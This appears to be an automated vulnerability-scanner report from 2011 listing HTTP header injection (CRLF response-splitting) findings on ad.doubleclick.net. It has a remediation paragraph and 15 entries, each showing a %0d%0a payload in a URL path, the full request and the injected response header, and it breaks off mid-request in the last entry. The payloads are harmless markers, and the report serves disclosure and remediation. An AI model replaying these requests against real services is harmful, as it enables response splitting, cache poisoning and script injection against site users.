XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Keyword, Citibank, 05092011-05

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/ad/N3905.thestreet.com/B5208662.2 [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3905.thestreet.com/B5208662.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3c6b7%0d%0ae7200ba767f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3c6b7%0d%0ae7200ba767f/N3905.thestreet.com/B5208662.2;sz=1x1;ord=%n? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/files/tsc/v2008/ads/openx/hosted/textLinks.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c6b7
e7200ba767f/N3905.thestreet.com/B5208662.2;sz=1x1;ord=%n:
Date: Mon, 09 May 2011 16:18:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/ad/N3926.131643.MEEBO/B5268973.6 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3926.131643.MEEBO/B5268973.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b388%0d%0a05e1eab443b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b388%0d%0a05e1eab443b/N3926.131643.MEEBO/B5268973.6;sz=1x1;ord=4965380? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=247wallst
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b388
05e1eab443b/N3926.131643.MEEBO/B5268973.6;sz=1x1;ord=4965380:
Date: Mon, 09 May 2011 16:19:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/ad/N3941.thestreet.com/B5325532.44 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3941.thestreet.com/B5325532.44

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31210%0d%0ab5b83c554e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31210%0d%0ab5b83c554e9/N3941.thestreet.com/B5325532.44;sz=1x1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/files/tsc/v2008/ads/openx/hosted/textLinks.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31210
b5b83c554e9/N3941.thestreet.com/B5325532.44;sz=1x1:
Date: Mon, 09 May 2011 16:18:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/ad/N5229.Sys-Con.com/B3221762.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5229.Sys-Con.com/B3221762.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9023e%0d%0a0f25c87f96f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9023e%0d%0a0f25c87f96f/N5229.Sys-Con.com/B3221762.2;abr=!ie4;abr=!ie5;sz=600x400;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://banners.sys-con.com/IFrames/JDJ_whitepaper_portlet_links.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9023e
0f25c87f96f/N5229.Sys-Con.com/B3221762.2;abr=!ie4;abr=!ie5;sz=600x400;ord=[timestamp]:
Date: Mon, 09 May 2011 16:18:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/adi/N4417.no_url_specifiedOX3395/B5375408.15 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4417.no_url_specifiedOX3395/B5375408.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22be4%0d%0aedb0180287 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22be4%0d%0aedb0180287/N4417.no_url_specifiedOX3395/B5375408.15;sz=728x90;pc=[TPAS_ID];;click=http://xads.zedo.com/ads2/c?a=917944%3Bn=1452%3Bx=3613%3Bc=1452000016,1452000016%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk%3D;ord=0.7839698642492294? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22be4
edb0180287/N4417.no_url_specifiedOX3395/B5375408.15;sz=728x90;pc=[TPAS_ID];;click=http: //xads.zedo.com/ads2/c
Date: Mon, 09 May 2011 16:20:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/adi/N4417.no_url_specifiedOX3395/B5375408.16 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4417.no_url_specifiedOX3395/B5375408.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18cbb%0d%0a2dcca05e09f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18cbb%0d%0a2dcca05e09f/N4417.no_url_specifiedOX3395/B5375408.16;sz=728x90;pc=[TPAS_ID];;click=http://xads.zedo.com/ads2/c?a=917941%3Bn=1452%3Bx=3613%3Bc=1452000004,1452000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk%3D;ord=0.42155086318962276? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18cbb
2dcca05e09f/N4417.no_url_specifiedOX3395/B5375408.16;sz=728x90;pc=[TPAS_ID];;click=http: //xads.zedo.com/ads2/c
Date: Mon, 09 May 2011 16:21:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/adi/N4417.no_url_specifiedOX3395/B5375408.17 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4417.no_url_specifiedOX3395/B5375408.17

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1fa69%0d%0a4ef1d5d63ce was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1fa69%0d%0a4ef1d5d63ce/N4417.no_url_specifiedOX3395/B5375408.17;sz=300x250;pc=[TPAS_ID];;click=http://xads.zedo.com/ads2/c?a=917940%3Bn=1452%3Bx=2333%3Bc=1452000004,1452000004%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk%3D;ord=0.6290432612877339? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fa69
4ef1d5d63ce/N4417.no_url_specifiedOX3395/B5375408.17;sz=300x250;pc=[TPAS_ID];;click=http: //xads.zedo.com/ads2/c
Date: Mon, 09 May 2011 16:21:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/adj/N1379.1199.THESTREET.COM/B5191871.28 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1379.1199.THESTREET.COM/B5191871.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 27907%0d%0acca0759fc87 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /27907%0d%0acca0759fc87/N1379.1199.THESTREET.COM/B5191871.28;sz=120x60;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://addelivery.thestreet.com/afr.php?zoneid=71&ActiveProducts=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/27907
cca0759fc87/N1379.1199.THESTREET.COM/B5191871.28;sz=120x60;ord=[timestamp]:
Date: Mon, 09 May 2011 16:17:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/adj/N4417.no_url_specifiedOX3395/B5375408.25 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4417.no_url_specifiedOX3395/B5375408.25

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 45dd2%0d%0af0db2f893fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /45dd2%0d%0af0db2f893fd/N4417.no_url_specifiedOX3395/B5375408.25;sz=120x60;pc=[TPAS_ID];;click=http://xads.zedo.com/ads2/c?a=917154%3Bn=1452%3Bx=7709%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk%3D;ord=0.39611394819803536? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/45dd2
f0db2f893fd/N4417.no_url_specifiedOX3395/B5375408.25;sz=120x60;pc=[TPAS_ID];;click=http: //xads.zedo.com/ads2/c
Date: Mon, 09 May 2011 16:21:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/adj/N4417.no_url_specifiedOX3395/B5375408.26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4417.no_url_specifiedOX3395/B5375408.26

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94d0d%0d%0ad33baaf4bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /94d0d%0d%0ad33baaf4bf0/N4417.no_url_specifiedOX3395/B5375408.26;sz=120x60;pc=[TPAS_ID];;click=http://xads.zedo.com/ads2/c?a=924298%3Bn=1452%3Bx=6685%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk%3D;ord=0.9414145285263658? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/94d0d
d33baaf4bf0/N4417.no_url_specifiedOX3395/B5375408.26;sz=120x60;pc=[TPAS_ID];;click=http: //xads.zedo.com/ads2/c
Date: Mon, 09 May 2011 16:20:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/adj/brokerbuttons.marketwatch.com/quotes [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/brokerbuttons.marketwatch.com/quotes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 302cb%0d%0ad23ec290dfd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /302cb%0d%0ad23ec290dfd/brokerbuttons.marketwatch.com/quotes;tile=1;pos=1;sym=CLM11;u=%5E%5E;sz=170x40;ord=428370705; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/investing/future/clm11?link=MW_widget_latestnews_247wallst.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/302cb
d23ec290dfd/brokerbuttons.marketwatch.com/quotes;tile=1;pos=1;sym=CLM11;u=^^;sz=170x40;ord=428370705;:
Date: Mon, 09 May 2011 16:24:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/adj/invc.americanbankingnews/equities [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/invc.americanbankingnews/equities

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c894%0d%0a307985166ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c894%0d%0a307985166ef/invc.americanbankingnews/equities;kw=;viewcount_americanbankingnews=01;kval=equities;tkr=;tile=1;sz=300x250;viewcount=01;ord=19184588128701? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c894
307985166ef/invc.americanbankingnews/equities;kw=;viewcount_americanbankingnews=01;kval=equities;tkr=;tile=1;sz=300x250;viewcount=01;ord=19184588128701:
Date: Mon, 09 May 2011 16:17:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/adj/invc.americanbankingnews/partnercenter [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/invc.americanbankingnews/partnercenter

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4d847%0d%0a0b40768b96c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4d847%0d%0a0b40768b96c/invc.americanbankingnews/partnercenter;kval=partnercenter;tile=4;sz=88x31;ord=6802303381264210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.investingchannel.com/bw_600x55.html?s=americanbankingnews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4d847
0b40768b96c/invc.americanbankingnews/partnercenter;kval=partnercenter;tile=4;sz=88x31;ord=6802303381264210:
Date: Mon, 09 May 2011 16:18:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/marketwatch.com/brokerdock

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58d59%0d%0a3e80f0d8196 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58d59%0d%0a3e80f0d8196/marketwatch.com/brokerdock;sym=CLM11;u=%5e%5e;sz=230x25;tile=1;ord=726643700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/investing/future/clm11?link=MW_widget_latestnews_247wallst.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58d59
3e80f0d8196/marketwatch.com/brokerdock;sym=CLM11;u=^^;sz=230x25;tile=1;ord=726643700:
Date: Mon, 09 May 2011 16:23:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/adj/q1.q.sanfrancisco/be_bus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e559%0d%0a80ecbb7f1f7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e559%0d%0a80ecbb7f1f7/q1.q.sanfrancisco/be_bus;net=q1;u=,q1-79848849_1304957835,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=300x250;net=q1;ord1=456064;contx=sports;dc=w;btg=am.h;btg=am.b;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h;ord=1412414579? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
